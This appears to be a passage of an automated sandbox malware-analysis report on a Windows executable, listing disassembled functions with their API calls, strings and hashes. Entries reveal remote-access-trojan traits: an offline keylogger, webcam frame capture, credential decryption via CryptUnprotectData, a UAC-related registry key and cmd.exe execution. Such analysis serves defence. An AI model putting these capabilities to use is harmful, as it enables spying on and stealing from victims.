                          • API String ID: 4061214504-1276376045
                          • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                          • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                          • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                          • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                          Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          Strings
                          • Connection KeepAlive | Disabled, xrefs: 004050D9
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                          • String ID: Connection KeepAlive | Disabled
                          • API String ID: 2993684571-3818284553
                          • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                          • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                          • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                          • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                          Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                          • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                          • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                          • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                          Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000,?), ref: 004044A4
                            • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prologSleep
                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                          • API String ID: 3469354165-3547787478
                          • Opcode ID: 2596316b9bbcd228594034146af270f3e01bd3c3610974548e797489da08f636
                          • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                          • Opcode Fuzzy Hash: 2596316b9bbcd228594034146af270f3e01bd3c3610974548e797489da08f636
                          • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                          Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          • _free.LIBCMT ref: 00442318
                          • _free.LIBCMT ref: 0044232F
                          • _free.LIBCMT ref: 0044234E
                          • _free.LIBCMT ref: 00442369
                          • _free.LIBCMT ref: 00442380
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$AllocateHeap
                          • String ID:
                          • API String ID: 3033488037-0
                          • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                          • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                          • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                          • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                          Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                          • _free.LIBCMT ref: 004468EC
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 00446AB8
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID:
                          • API String ID: 1286116820-0
                          • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                          • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                          • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                          • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                          Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                          • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                          • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                          • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                          Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                          • __alloca_probe_16.LIBCMT ref: 0044E391
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                          • __freea.LIBCMT ref: 0044E3FD
                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                          • String ID:
                          • API String ID: 313313983-0
                          • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                          • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                          • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                          • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                          Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                          • _free.LIBCMT ref: 0044C59F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                          • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                          • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                          • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                          Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                          • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreatePointerWrite
                          • String ID:
                          • API String ID: 1852769593-0
                          • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                          • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                          • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                          • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                          Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                          • _free.LIBCMT ref: 004457E3
                          • _free.LIBCMT ref: 0044580A
                          • SetLastError.KERNEL32(00000000), ref: 00445817
                          • SetLastError.KERNEL32(00000000), ref: 00445820
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                          • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                          • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                          • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                          Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00441566
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 00441578
                          • _free.LIBCMT ref: 0044158B
                          • _free.LIBCMT ref: 0044159C
                          • _free.LIBCMT ref: 004415AD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                          • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                          • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                          • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                          Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum$InfoQueryValue
                          • String ID: [regsplt]
                          • API String ID: 3554306468-4262303796
                          • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                          • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                          • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                          • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                          Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _strpbrk.LIBCMT ref: 0044B918
                          • _free.LIBCMT ref: 0044BA35
                            • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                            • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                            • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                          • String ID: *?$.
                          • API String ID: 2812119850-3972193922
                          • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                          • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                          • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                          • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                          Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0040189E
                          • ExitThread.KERNEL32 ref: 004018D6
                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                          • String ID: 8:G
                          • API String ID: 1649129571-405301104
                          • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                          • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                          • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                          • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                          Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\RTdozXra.exe,00000104), ref: 00440975
                          • _free.LIBCMT ref: 00440A40
                          • _free.LIBCMT ref: 00440A4A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\AppData\Roaming\RTdozXra.exe
                          • API String ID: 2506810119-1917151568
                          • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                          • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                          • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                          • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                          Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                            • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                            • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                          • _wcslen.LIBCMT ref: 00419744
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                          • String ID: .exe$program files (x86)\$program files\
                          • API String ID: 37874593-1203593143
                          • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                          • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                          • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                          • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                          Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                          • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                          • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread$LocalTimewsprintf
                          • String ID: Offline Keylogger Started
                          • API String ID: 465354869-4114347211
                          • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                          • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                          • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                          • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                          Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                          • GetProcAddress.KERNEL32(00000000), ref: 00406097
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: CryptUnprotectData$crypt32
                          • API String ID: 2574300362-2380590389
                          • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                          • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                          • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                          • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                          Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                          • CloseHandle.KERNEL32(?), ref: 004051AA
                          • SetEvent.KERNEL32(?), ref: 004051B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandleObjectSingleWait
                          • String ID: Connection Timeout
                          • API String ID: 2055531096-499159329
                          • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                          • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                          • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                          • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                          Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                          • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                          • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                          • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                          Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                          • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                          • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: origmsc
                          • API String ID: 3677997916-68016026
                          • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                          • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                          • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                          • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                          Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                          Strings
                          Memory Dump Source
